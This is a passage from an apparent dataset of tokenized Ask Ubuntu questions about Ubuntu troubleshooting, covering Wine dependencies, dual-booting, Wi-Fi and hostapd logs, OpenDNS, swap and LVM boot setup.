6 419gb 790gb 372gb logical ntfs 7 790gb 895gb 105gb logical ntfs 8 895gb 1000gb 105gb logical ntfs
235082	wine has dependency issues	okay , i like to use aptitude for most of my program installation , due to its exceptional handling of dependencies ( it 's very diligent about removing unused libraries . ) unfortunately , it appears not to be able to install wine . the log is here . now , i can usually get away with typing sudo apt-get install wine , and it will be fine , but the next time i run aptitude ( i usually prefer it for programs that have many dependencies , ) wine is removed . anyway , i did n't manage to figure out what was wrong ( i could make out that it has something to do with an unresolvable dependency , ) but i was hoping that somebody else could figure it out .
235084	how do i remove ubuntu 's password requirement ?	here are my circumstances : i am running ubuntu 12.04 . i have one user account . i absolutely hate the password requirement . how do i disable this requirement such that my linux computer will behave more like windows in this respect ? i do not want to hear that i should n't this because it is not secure . this is my desire so the concern of security is effectively null and void .
235089	how can i run anacron in user mode ?	i would like to set up a scheduled task via anacron but i would like to do so in user mode . how can i achieve this ?
235091	make multiple files hidden ?	i have a group of files i want hidden to avoid clutter . is there a command that can simply make multiple files hidden ? is there an application ? is there a single command that will make the files i 've listed hidden ? thanks .
235093	lightread in the message menu	i was wondering if it were possible to put light read into the messaging menu , i have tried to create the file to place it there but it did n't work . i was wondering how to get lightread to show up in the messaging menu .
235098	beginning developing applications for ubuntu	first of all thanks for reading this question : what programming language is used for developing ubuntu applications ? in other words , i would like to begin producing application for ubuntu but do n't know where to begin , any help would be great , especially tutorials .
235099	visualize pressed keys onscreen	i want to show others what keys i currently press onscreen . unfortunately , neither xvkbd nor florence nor onboard visualize the keys i press . what else can i use ?
235100	which driver do i have installed ?	i have installed amd flgrx-updates from ubuntu repos . which version driver is it ? on the amd website the latest amd catalyst driver is 12.10 stable and 12.11 beta .
235103	library installation	to clear my doubt consider i am installing an application 'something ' from the software centre . 'something ' depends on a library 'libx ' whose version is x.0.2 . so it gets installed . now i want to install the library 'libx-x.2.2 ' . i am gon na download the source files and i decided to build it from the source . so my doubt is , what happens to the previous version 'x.0.2 ' when i build 'x.2.2 ' from source ? also i do not have the -dev version of the library installed already . so what should i do now ? thanks in advance .
235104	move system to external hdd , keep /home internal	my computer has a relatively small hdd ( 80gb ) , but i also just recently got a hdd enclosure for an old hdd , and it can hold 60gb . i 'm running out of room on my internal hdd ( the 80gb one ) , and so i decided i should move my system files to the external ( the 60gb one ) and keep my /home on the internal , since it 's the larger portion of all my files ( 50gb out of ~75gb ) . i know there are ways to move your /home to a separate partition , but i do n't think i can move system files because they 're configured specifically for my internal hdd and such , and moving them would essentially break my install . is there a way to move my ubuntu installation to my external hdd , leaving my /home on my internal hdd ? or is doing a fresh install the best/only method for achieving this ? system info : xubuntu 12.10 80gb internal hard drive 60gb external hard drive
235107	somehow i do n't see a boot menu when trying to dual-boot with windows 8 . how to fix ?	i have installed ubuntu on my laptop that comes with windows 8 pre-installed . if i turn it on it just boots to windows 8 and does not give me a dual boot choice , as i would have expected . like i now how to boot up to it but it takes forever . i boot it up from the bios .
235110	how do i use network manager ( instead of command line tools ) for wifi with broadcom bcm4401 card when booting without network cable ?	i installed 12.04 on to a non-pae laptop using the network-based ( ncurses interface ) install disk . once i had the unity desktop up-and-running , wireless was working fine `` out of the box '' with the wired network plugged in . when i try to boot without the wired network plugged in , i get some unhappy messages and long waits . ( `` waiting for network configuration ... '' followed by `` waiting up to 60 more seconds for network configuration ... '' and finally `` booting system without full network configuration '' ) then , once booted , the unity system-bar wifi-helper icon ( the graphical interface to the network-manager service ) is missing and there is no obvious graphical way to get the system online using its wireless hardware . because i have a wpa2 secured network , i have to manually setup wpa_supplicant to actually get online : me @ system : ~ $ wpa_passphrase $ myssid $ networksecuritykey > local.conf me @ system : ~ $ sudo wpa_supplicant -d wext -i eth0 -c./local.conf -b me @ system : ~ $ sudo dhclient eth0 after a few seconds , the card is connected , has an ip configuration and i 'm ready to go . i have discovered some advice referenced from another question , so i think i can eliminate the long boot time . i think i know how to add the wpa_supplicant and dhclient calls to the end of the boot process . but what i really want is for the built-in unity tools to work and to handle all the details for me . even after starting the network as described above , i have tried starting network-manager manually : me @ system : ~ $ sudo service network-manager start this causes the network-manager system-bar icon to appear but , under these conditions , most of the options are grayed-out in its context menu : wired network device not managed -- -- -- -- -- -- - wireless network wireless is disabled -- -- -- -- -- -- - ... and when network-manager comes up , it shuts down the wireless interface . i have to stop the service and rerun dhclient in order to get back online . any recommendations on how to put everything right ? hardware info : a dell inspiron 600m with : 32-bit intel pentium m 1.6ghz 1 gig ram ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) network controller : intel corporation pro/wireless 2200bg [ calexico2 ] network connection ( rev 05 ) what else would help ? ( post a comment if you would like me to provide more information ! )
235112	how can i completely erase files ?	i 've got an older computer with an 80 gb hard drive . i 'm trying to keep the hard drive as clear as possible and delete any downloaded files that i no longer need . i was just wondering , if i delete a file ( which sends it to the trash bin ) and then empty the trash bin , does that completely delete the file off the hard drive ? if not , is there a good way to clean up the hard drive from time to time without erasing necessary programs ?
235115	deluge getting permission denied when trying to download to a mounted drive	getting permission denied when trying to download or move_storage of a torrent to a mounted drive ( saw the error with deluded ) . the drive is an internal hdd mounted with this command at /etc/fstab . /media/username/584c1e8b4c1e63d2 ntfs-3g defaults , locale=en_us.utf8 0 0 what 's the solution to this ? os : ubuntu 12.10 , 64bit
235117	ca n't install guest additions for windows xp x64 on virtual box [ i am running 12.10 ]	i have set up windows xp on virtual box on my laptop which is running ubuntu 12.10 . now , i am trying to install guest additions on the vm . but , whenever i click it , it does n't open the oracle window . nothing comes up actually . i tried doing this in safe mode , but it still does n't work . someone please help .
235120	many intro questions re ubuntu on nexus 7 ; dual-boot , capabilities	i seem to have thought ubuntu on the nexus 7 was further along than it is . i have many questions . here are some . irc - where is the discussion of ubuntu on my device taking place ? it is not in any free node channel i can find . eg , android nexus ubuntu ubuntu-quality sdx-developers android-root when i use the nexus 7 with ubuntu need i have an external monitor ? may i use a mouse and keyboard at the same time ? with bluetooth ? can i do youtube ? flash ? what apps/programs are there for it ? can i run a printer ? external optical drive ? use vlc ? play a movie from an external sd card ? what kind of battery time can i expect ? with or w/o wifi ? how much space does the jb is take up on the device ? how much space does ubuntu take up ? glad i have the 32g . is this model completely supported ? i do n't use it now but is the sim card supported ? - : - ) is there a better place to ask this ? thanks . -- -- i do not understand the fork of ubuntuforums.org and askubuntu.com i wanted to use the tag of nexus or nexus7 but i do not have enough `` reputations '' here though i have used ubuntu forums many times . -- -- i am so disappointed with jb which is impotent about simple things . there is no undo while editing . oops i touched and a para vanished .
235126	simulate media keys in terminal	i have a new android phone that has a number of apps for communicating though an ssh connection . i would like to know if i can use ssh commands if i can simulate key pressed , specifically the media keys ( play pause volume ) . i would prefer not to install additional software . note : i know there are apps that do this out of the box , this is simply for a better understanding .
235127	where can i get libstdc++5 packages	does any body know where can i get the below packages : libstdc++5_3.3.6-17ubuntu1_amd64.deb libstdc++5_3.3.6-17ubuntu1_i386.deb i was following this link and the location referenced in that tutorial does not exist any more.. thanks so much..
235128	getting around uefi boot loader to install ubuntu	i recently added a new 3tb hd to my rig , but when i tried to reinstall ubuntu i started having problems with the stock uefi bios/bootloader that came with my asus m5a97 motherboard . i remember facing this problem over a year ago , i ended up getting an older version of ubuntu to install fine , then upgrading to a current version ... .now i ca n't even get this to work . anybody ? greatly appreciated !
235129	opendns setup failed . how to fix it ?	i have problems trying to configure opendns . i have contacted opendns support but they did not answer . i can not access websites like twitter and facebook . i tried welcome.opendns.com ( did not work , shows not using opendns . using nslookup : $ nslookup -type=txt which.opendns.com . 208.67.222.222 server : 208.67.222.222 address : 208.67.222.222 # 53 non-authoritative answer : which.opendns.com text = `` 7.sin '' authoritative answers can be found from : $ nslookup -type=txt debug.opendns.com . server : 127.0.1.1 address : 127.0.1.1 # 53 non-authoritative answer : debug.opendns.com text = `` server 3.sin '' debug.opendns.com text = `` flags 20 0 2f6 0 '' debug.opendns.com text = `` id 13521181 '' debug.opendns.com text = `` source 222.164.129.44:62574 '' authoritative answers can be found from : $ nslookup www.exampleadultsite.com . server : 127.0.1.1 address : 127.0.1.1 # 53 non-authoritative answer : name : www.exampleadultsite.com address : 67.215.92.210
235134	ftp access to a windows machine on lan ?	i am on a lan network on which most of the systems are windows based and only i am using ubuntu 12.10 . i want to access the shared folders on these systems using my ubuntu . i have installed samba and am able to access these folders using nautilus . however i want to be able to browse these using commandline or some other software like filezilla . entering the ip of the host in filezilla does not work . how should i go about doing this ? ( background info : the reason why i 'm asking this is that a few systems on the lan do not appear in nautilus . i verified that they are connectible by using ping . on windows when such a situation occurs i.e . and a host fails to appear in the explorer , i simply press start + r , type \\host-ip and press enter . what is the equivalent in ubuntu ? )
235136	how can i have one application sit above a panel ?	( ( ( anticipating the `` why are you using compiz with xfce ? ! ? ! ? ! ? ! '' comments ) ) ) i am using the following setup : xfce panel on top and bottom of screen compiz as a window manager . i have an application that i enjoy running in full screen , but when i run it , it is under the panel . the icons of the panel are in the application and they get in the way of the application itself . is there a way , either with compiz or xfce itself , to have the panel sit below this application , and only this application ?
235146	why does ubuntu use swap when there is enough free memory ?	while running virtual box my system is accessing the hard drive a lot and running slowly . when i checked system resources using system monitor it shows processor usage at 15 % , ram usage at 65 % and swap usage at about 50 % . my question is why does ubuntu need to use swap when there is sufficient amount of main memory available ? edit - output of free command - total used free shared buffers cached mem : 4075908 3056931 1018977 0 1944 308408 -/+ buffers/cache : 2746579 1329329 swap : 4139004 1862551 2276453 note - virtual box seemed to work just fine before i upgraded my 12.04 precise to 12.10 quantal . now its so slow its almost useless .
235149	suddenly got weird colors in mkv movies	suddenly i got weird colors in mkv movies in both vlc and totem on ubuntu 11.10 . the sound is ok . anybody know what is the problem and how to fix it .
235150	error while installing matlabr2011b	error while installing matlabr2011b in ubuntu 12.04 64bit os preparing installation files ... installing ... install : 1 : eval : /tmp/mathworks_9756/sys/java/jre/glnxa64/jre/bin/java : permission denied finished
235151	hostapd dropout	i have configured hostapd as an access point following several how-tos using ubuntu 12.04 . everything works well for up to several hours and then at some point hostapd no longer accepts new connections . hostapd config is as follows : ssid=pnn wpa_passphrase=somepassphrase interface=wlan2 bridge=br0 auth_algs=3 channel=7 driver=nl80211 hw_mode=g logger_stdout=-1 logger_stdout_level=2 max_num_sta=255 rsn_pairwise=ccmp wpa=2 wpa_key_mgmt=wpa-psk wpa_pairwise=tkip ccmp using the output of hostapd -dd /etc/hostapd/hostapd.conf under normal circumstances new connections are picked up as follows : mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for our ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown microsoft information element ignored ( type=8 len=7 ) sta 3c : d0 : f8:10:0f : f0 sent probe request for broadcast ssid mgmt : :auth authentication : sta=40 : a6 : d9 : a5:63 : dd auth_alg=0 auth_transaction=1 status_code=0 wep=0 new sta wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : authentication ok ( open system ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-authenticate.indication ( 40 : a6 : d9 : a5:63 : dd , open_system ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-deletekeys.request ( 40 : a6 : d9 : a5:63 : dd ) authentication reply : sta=40 : a6 : d9 : a5:63 : dd auth_alg=0 auth_transaction=2 resp=0 ( ie len=0 ) mgmt : :proberesp cb mgmt : :auth cb wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : authenticated mgmt : :assoc_req association request : sta=40 : a6 : d9 : a5:63 : dd capab_info=0x431 listen_interval=10 unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) new aid 1 wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : association ok ( aid 1 ) mgmt : :assoc_resp cb wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : associated ( aid 1 ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-associate.indication ( 40 : a6 : d9 : a5:63 : dd ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-deletekeys.request ( 40 : a6 : d9 : a5:63 : dd ) wpa_driver_nl80211_set_key : ifindex=6 alg=0 addr=0x216f2b0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : event 1 notification wpa_driver_nl80211_set_key : ifindex=6 alg=0 addr=0x216f2b0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : start authentication wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state initialize wpa_driver_nl80211_set_key : ifindex=6 alg=0 addr=0x216f2b0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.1x : unauthorizing port wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk_group entering state idle wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state authentication wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state authentication2 wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state initpsk wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkstart wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : sending 1/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=0 mic=0 ack=1 install=0 pairwise=8 kde_len=0 keyidx=0 encr=0 ) nl80211 : event message available nl80211 : ignored unknown event ( cmd=19 ) ieee 802.1x : 40 : a6 : d9 : a5:63 : dd tx status - version=2 type=3 length=95 - ack=1 ieee 802.1x : 121 bytes from 40 : a6 : d9 : a5:63 : dd ieee 802.1x : version=2 type=3 length=117 wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : received eapol-key frame ( 2/4 pairwise ) wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkcalcnegotiating wpa : ptk derivation - a1=00:0e:8e:3f : f9:71 a2=40 : a6 : d9 : a5:63 : dd wpa : pmk - hexdump ( len=32 ) : [ removed ] wpa : ptk - hexdump ( len=48 ) : [ removed ] wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkcalcnegotiating2 wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkinitnegotiating wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : sending 3/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=1 pairwise=8 kde_len=46 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=56 ) : [ removed ] ieee 802.1x : 40 : a6 : d9 : a5:63 : dd tx status - version=2 type=3 length=151 - ack=1 ieee 802.1x : 99 bytes from 40 : a6 : d9 : a5:63 : dd ieee 802.1x : version=2 type=3 length=95 wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : received eapol-key frame ( 4/4 pairwise ) wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkinitdone wpa_driver_nl80211_set_key : ifindex=6 alg=3 addr=0x216f2b0 key_idx=0 set_tx=1 seq_len=0 key_len=16 addr=40 : a6 : d9 : a5:63 : dd ap-sta-connected 40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.1x : authorizing port wlan2 : sta 40 : a6 : d9 : a5:63 : dd radius : starting accounting session 50e3df21-00000000 wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : pairwise key handshake completed ( rsn ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown microsoft information element ignored ( type=8 len=7 ) sta 3c : d0 : f8:10:0f : f0 sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown microsoft information element ignored ( type=8 len=7 ) sta 5c:95 : ae : d8 : b7 : ec sent probe request for broadcast ssid mgmt : :proberesp cb once hostapd no longer accepts new connections the output is as follows : mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for our ssid mgmt : :proberesp cb mgmt : :auth authentication : sta=40 : a6 : d9 : a5:63 : dd auth_alg=0 auth_transaction=1 status_code=0 wep=0 new sta wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : authentication ok ( open system ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-authenticate.indication ( 40 : a6 : d9 : a5:63 : dd , open_system ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-deletekeys.request ( 40 : a6 : d9 : a5:63 : dd ) authentication reply : sta=40 : a6 : d9 : a5:63 : dd auth_alg=0 auth_transaction=2 resp=0 ( ie len=0 ) mgmt : :auth cb wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : authenticated mgmt : :assoc_req association request : sta=40 : a6 : d9 : a5:63 : dd capab_info=0x431 listen_interval=10 unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) new aid 1 wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : association ok ( aid 1 ) mgmt : :assoc_resp cb wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : associated ( aid 1 ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-associate.indication ( 40 : a6 : d9 : a5:63 : dd ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd mlme : mlme-deletekeys.request ( 40 : a6 : d9 : a5:63 : dd ) wpa_driver_nl80211_set_key : ifindex=6 alg=0 addr=0x263c270 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : event 1 notification wpa_driver_nl80211_set_key : ifindex=6 alg=0 addr=0x263c270 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : start authentication wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state initialize wpa_driver_nl80211_set_key : ifindex=6 alg=0 addr=0x263c270 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.1x : unauthorizing port wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk_group entering state idle wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state authentication wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state authentication2 wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state initpsk wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkstart wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : sending 1/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=0 mic=0 ack=1 install=0 pairwise=8 kde_len=0 keyidx=0 encr=0 ) nl80211 : event message available nl80211 : ignored unknown event ( cmd=19 ) ieee 802.1x : 40 : a6 : d9 : a5:63 : dd tx status - version=2 type=3 length=95 - ack=1 wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : eapol-key timeout wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkstart wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : sending 1/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=0 mic=0 ack=1 install=0 pairwise=8 kde_len=0 keyidx=0 encr=0 ) ieee 802.1x : 40 : a6 : d9 : a5:63 : dd tx status - version=2 type=3 length=95 - ack=1 unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 00:15:6d:60 : da:3b sent probe request for broadcast ssid mgmt : :proberesp cb sta 00:15:6d:60 : da:3b sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : eapol-key timeout wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkstart wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : sending 1/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=0 mic=0 ack=1 install=0 pairwise=8 kde_len=0 keyidx=0 encr=0 ) ieee 802.1x : 40 : a6 : d9 : a5:63 : dd tx status - version=2 type=3 length=95 - ack=1 sta 00:15:6d:60 : da:3b sent probe request for broadcast ssid mgmt : :proberesp cb wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : eapol-key timeout wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkstart wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : sending 1/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=0 mic=0 ack=1 install=0 pairwise=8 kde_len=0 keyidx=0 encr=0 ) ieee 802.1x : 40 : a6 : d9 : a5:63 : dd tx status - version=2 type=3 length=95 - ack=1 sta 00:15:6d:60 : da:3b sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) wlan2 : sta 40 : a6 : d9 : a5:63 : dd wpa : eapol-key timeout wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state ptkstart wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state disconnect hostapd_wpa_auth_disconnect : wpa authenticator requests disconnect : sta 40 : a6 : d9 : a5:63 : dd reason 2 wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state disconnected wpa : 40 : a6 : d9 : a5:63 : dd wpa_ptk entering state initialize wpa_driver_nl80211_set_key : ifindex=6 alg=0 addr=0x263c270 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=40 : a6 : d9 : a5:63 : dd wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.1x : unauthorizing port wlan2 : sta 40 : a6 : d9 : a5:63 : dd ieee 802.11 : deauthenticated due to local deauth request nl80211 : event message available nl80211 : ignored unknown event ( cmd=20 ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : a5:63 : dd sent probe request for broadcast ssid mgmt : :proberesp cb unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) unknown vendor specific information element ignored ( vendor oui 00:10:18 len=9 ) sta 40 : a6 : d9 : b0 : cd : fd sent probe request for broadcast ssid mgmt : :proberesp cb running the following fixes the problem for another couple of hours . sudo service hostapd restart i 've done as much reading as possible and have tried reducing the txpower of wlan2 from 16dbm to 10dbm as suggested for stability problems but the problem remains . if anyone could assist it would be greatly appreciated .
235155	qgtkstyle was unable to detect the current gtk+ theme	when i start any qt app , i get this message in the terminal , and the qt app does n't use the same theme as my gtk apps : qgtkstyle was unable to detect the current gtk+ theme . how do i make qgtkstyle detect my current gtk+ theme ? it seems that lxde is using a settings daemon , and there is no gtkrc-2.0 file in my home folder .
235156	when installing /boot inside a lvm group , where do i install the boot loader ?	i am setting a personal file/cloud server based on ubuntu server 12.04 and owncloud but there are certain things about the partitioning that i ca n't get my head around ... let 's say for example i want to install ubuntu server 12.04 on my machine that has 500gb hdd . i would add 3tb hdds as time goes on until ether the case or the motherboard does n't allow me to add more hdds and in that circumstance i would need to replace the 500gb hdd in which i originally installed the system . by using lvm i could move all the partitions to the other disks while i replace the 500gb hdd but i 'm worried about the system not booting : if i install the boot loader on the disk itself , it will be lost when replacing the hdd and if i install the boot loader inside /boot ( in the vg ) i fear it would not boot or may still have problems when moving files and partitions around with lvm ( which is something i need to do when replacing the hdd ) . i 'm also worried about the name of the device conflicting on what i 'm trying to do . is there a good way to work around this ? maybe install everything inside the vg and when i replace the hdd then manually install the boot loader or any other way , i just want to be prepared for the time when i replace the hdd without compromising my data . note : i 'll be using grub2 and lvm2 . thanks for the help ! ! !
235162	how to install mpeg-4 aac and h.264 decoder on ubuntu 10.10 ?	i 'm trying to play a video which requires the above mentioned plugins . i 've looked at a few answers on this topic here but it has n't resolved the issue for me . what i 've tried until now : 1 ) sudo apt-get install ubuntu-restricted-extras ... but this one 's having some issues and skipping downloading some packages ... so the whole thing does n't get downloaded completely . 2 ) i 've tried sudo add-apt-repository `` deb http : //archive.ubuntu.com/ubuntu $ ( lsb_release -sc ) main universe restricted multiverse '' to add the above repositories to the ubuntu 's source.list for download places but it has n't helped . anyone knows what else can i try to get this working ?
235164	dual boot problem ( windows 8 and ubuntu 12.04 )	i had installed in my laptop windows and ubuntu , because windows did not work , i reinstall her . new i can not start ubuntu , when i power on my laptop , it do not ask me which os i want start and boot automatic windows . what to do ? i am novice : (
235165	how do i upgrade ubuntu to amd64 from i386 on my dual boot system ?	in my system , windows and ubuntu are installed alongside ( dual boot ) . i wish to upgrade ubuntu to 64 bit , but the only way seems to be uninstalling current ubuntu ( 32 bits ) and performing a clean installation of ubuntu ( 64 bits ) please assist me on how to perform an in-place upgrade from 32 to 64 bits .
235168	can i edit login script	can i edit login script ? for i want to restrict the user to only have 3 login attempts . if the user fails to login in after 3 attempts , the system must shutdown . is this possible ?
235169	how do i retrieve my files if mounting gives me a `` bad superblock '' error ?	i got my ubuntu 12.04 corrupted after a sudden power cut . i 've tried to retrieve my data from a live usb but i am not able to mount my main disk ( /dev/sda1 ) . it gives me a error about a bad super block and something like that . please provide me some assistence on this as i am not sure how to proceed . i just want to retrieve my data .
235173	freeze during a restart on aspire 4751z	i notice this happen every time with my acer aspire 4751z . whenever i reboot from ubuntu , the boot up freezes during `` bios load '' . that means , the boot up menu is n't shown yet . i also have windows xp installed and the same effect is rarely seen with windows xp . well this post is more about an explanation rather than a solution . i want to know , what really happens during a reboot for this scenario to occur all the time . i was under the impression , during a reboot , the last instance of loaded os has no presence , or does it occupy some resources that cause this .
